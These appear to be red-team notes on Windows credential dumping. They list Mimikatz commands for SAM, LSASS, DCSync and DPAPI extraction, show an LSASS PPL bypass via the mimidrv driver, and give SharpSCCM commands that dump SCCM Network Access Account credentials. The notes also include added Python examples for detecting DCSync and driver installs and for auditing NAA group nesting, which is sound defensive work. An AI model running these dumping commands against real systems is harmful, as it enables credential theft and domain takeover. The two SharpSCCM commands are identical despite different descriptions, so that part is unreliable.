Credential dumping
LaZagne
TODO
Mimikatz
| Command | Privileges | Description |
|---|---|---|
| `lsadump::sam` | Admin | Dump credentials from the Security Account Manager |
| `lsadump::cache` | Admin | Dump domain cached credentials. These can be cracked offline to extract the password. |
| `lsadump::dcsync` | Domain Admin | Perform a DCSync attack |
| `sekurlsa::logonpasswords` | Admin | Dump NTLM hashes and plaintext passwords from memory |
| `sekurlsa::ekeys` | Admin | Dump Kerberos encryption keys of currently logged-on users (often more useful, as Windows services typically use Kerberos instead of NTLM) |
| `crypto::certificates /export` | User / Admin | Dump user certificates to disk. The export password will be `mimikatz`. If you have admin rights, supply `/systemstore:local_machine` to dump computer certificates. |
| `sekurlsa::dpapi` | Local Admin | If the DPAPI keys are stored in LSASS, dump them using this command |
| `dpapi::masterkey /in:%appdata%\Microsoft\Protect\GUID /rpc` | User | Requests the user's master key from the DC over RPC (requires impersonation). |
| `ts::multirdp` | Admin | Requires `privilege::debug` beforehand. Enable RDP access for two users. https://tools.thehacker.recipes/mimikatz/modules/ts/multirdp |
Trust dumping docs: https://tools.thehacker.recipes/mimikatz/modules/lsadump/trust
DCsync
```powershell
Using 'a.dcsync' for logfile : OK
mimikatz # lsadump::dcsync /csv /all
[DC] 'lab.local' will be the domain
[DC] 'DC1.lab.local' will be the DC server
```
Bypass PPL protection
```powershell
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # sekurlsa::
```
After extraction, restore the configuration:
```powershell
mimikatz # !processprotect /process:lsass.exe /add
Process : lsass.exe
PID 680 -> 3f/3f [2-0-6]
mimikatz # !-
[+] 'mimidrv' service stopped
[+] 'mimidrv' service removed
```
Mimikatz cheatsheet: Mimikatz cheat sheet
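Both techniques above leave traces a defender can key on: a DCSync pulls replication data, which the DC records as a Security event 4662 whose Properties carry the DS-Replication-Get-Changes control rights, and the PPL bypass needs the `mimidrv` kernel driver, which shows up as a new service in System event 7045 (the `!+` step; `!-` stops and removes it again). The following detection logic is an added example, not Mimikatz code or anything from the original notes; the events are constructed samples whose field names mirror the Windows event XML data, and the DC allowlist is an assumption you would replace with your own controllers and known sync accounts.

```python
"""Detection logic for the two Mimikatz techniques shown above: DCSync
(Security 4662 replication requests) and the PPL bypass (the mimidrv
kernel driver registered as a service, System 7045). All events below are
constructed samples; field names mirror the Windows event XML data."""
from dataclasses import dataclass, field

# Control-access-right GUIDs for directory replication. A 4662 event whose
# Properties list one of them records a replication request, which is what
# lsadump::dcsync issues against the DC.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}


@dataclass
class Event:
    event_id: int
    data: dict = field(default_factory=dict)


def is_replication_request(evt):
    """True when a Security 4662 event carries a replication control right."""
    if evt.event_id != 4662:
        return False
    props = evt.data.get("Properties", "").lower()
    return any(guid in props for guid in DS_REPLICATION_GUIDS)


def dcsync_alerts(events, replication_allowlist):
    """Events where an account outside the allowlist requested replication.

    Domain controller machine accounts (NAME$) and known directory sync
    accounts replicate legitimately; any other principal asking for
    Get-Changes-All is a DCSync candidate."""
    allow = {a.lower() for a in replication_allowlist}
    return [
        evt for evt in events
        if is_replication_request(evt)
        and evt.data.get("SubjectUserName", "").lower() not in allow
    ]


def driver_install_alerts(events, driver_names=("mimidrv",)):
    """System 7045 entries that register a service whose name or image
    path matches a watched driver name."""
    names = tuple(n.lower() for n in driver_names)
    hits = []
    for evt in events:
        if evt.event_id != 7045:
            continue
        svc = evt.data.get("ServiceName", "").lower()
        image = evt.data.get("ImagePath", "").lower()
        if any(n in svc or n in image for n in names):
            hits.append(evt)
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    Event(4662, {"SubjectUserName": "DC1$",
                 "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}),
    Event(4662, {"SubjectUserName": "jdoe",
                 "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                               "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}),
    # constructed GUID that is not a replication right: ordinary object access
    Event(4662, {"SubjectUserName": "jdoe",
                 "Properties": "{00000000-0000-0000-0000-000000000000}"}),
    Event(7045, {"ServiceName": "mimidrv",
                 "ImagePath": "C:\\Users\\jdoe\\mimidrv.sys",
                 "ServiceType": "kernel mode driver"}),
    Event(7045, {"ServiceName": "Spooler",
                 "ImagePath": "C:\\Windows\\System32\\spoolsv.exe",
                 "ServiceType": "user mode service"}),
]

# Assumed allowlist: the lab's domain controllers. Add directory sync
# service accounts here as well in a real deployment.
DC_ALLOWLIST = ["DC1$", "DC2$"]

if __name__ == "__main__":
    for evt in dcsync_alerts(SAMPLE_EVENTS, DC_ALLOWLIST):
        print("possible DCSync by", evt.data["SubjectUserName"])
    for evt in driver_install_alerts(SAMPLE_EVENTS):
        print("watched driver installed:", evt.data["ServiceName"])
```

The allowlist matters more than the GUID match: replication itself is normal traffic between controllers, so the signal is who asked, not that someone did. Matching on the image path as well as the service name catches a renamed service that still loads the driver from a user-writable directory.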
SharpSCCM
Network Access Account credentials
If computers that are not domain-joined still connect to SCCM, the credentials they use may be recoverable from SCCM policy artifacts; SharpSCCM can dump and decrypt them.
Requirements:
- Machine with access to SCCM
- Privileged account on that machine
```powershell
# Dump Network Access Account credentials
SharpSCCM.exe local naa -m wmi --no-banner
# Ask SCCM for the policy containing the credentials
SharpSCCM.exe local naa -m wmi --no-banner
```
By default, these credentials should only have read access to the SDP. However, they are often over-permissive and sometimes even have domain admin rights.
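The over-permission usually hides in nested group membership: the NAA is rarely a direct member of Domain Admins, but it may sit in a group that is. The audit below is an added example, not SharpSCCM code or anything from the original notes; it resolves effective membership over a constructed directory snapshot (group name to direct members), and the account names, group names and privileged-group list are assumptions for illustration.

```python
"""Audit whether an SCCM Network Access Account is over-permissive by
resolving its effective (nested) group membership. The directory snapshot
is constructed for illustration; in practice the group -> member
relationships would be exported from Active Directory."""
from collections import deque

# Constructed snapshot: group name -> direct members (accounts or groups).
DIRECTORY = {
    "Domain Admins": {"Administrator", "IT-Tier0"},
    "IT-Tier0": {"svc_sccm_naa"},                       # nesting hides the privilege
    "SCCM-DP-Readers": {"svc_sccm_naa", "svc_naa_minimal"},
    "Domain Users": {"svc_sccm_naa", "svc_naa_minimal", "jdoe"},
}

# Groups an NAA should never reach: read access to the distribution point
# is all the account needs.
PRIVILEGED_GROUPS = {
    "Domain Admins", "Enterprise Admins", "Administrators", "Account Operators",
}


def effective_groups(account, directory):
    """Every group the account belongs to directly or through nesting,
    mapped to the chain of groups that produced the membership."""
    paths = {}
    queue = deque([(account, [])])
    while queue:
        member, chain = queue.popleft()
        for group, members in directory.items():
            # Record the first (shortest) chain that reaches each group.
            if member in members and group not in paths:
                paths[group] = chain + [group]
                queue.append((group, chain + [group]))
    return paths


def naa_findings(account, directory, privileged=PRIVILEGED_GROUPS):
    """Privileged groups the NAA reaches, each with the membership chain
    that explains how; an empty result means the account is scoped as it
    should be."""
    groups = effective_groups(account, directory)
    return {
        group: " -> ".join([account] + chain)
        for group, chain in groups.items()
        if group in privileged
    }


if __name__ == "__main__":
    for acct in ("svc_sccm_naa", "svc_naa_minimal"):
        findings = naa_findings(acct, DIRECTORY)
        status = "OVER-PERMISSIVE" if findings else "ok"
        print(f"{acct}: {status}")
        for group, chain in findings.items():
            print(f"  {group} via {chain}")
```

Reporting the chain rather than just the group name is what makes the finding actionable: the fix is to remove the NAA from the intermediate group (here the nested one), not to rebuild the privileged group.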
The original notes referenced additional internal sections (e.g. "User impersonation / Make token") which are not part of this export.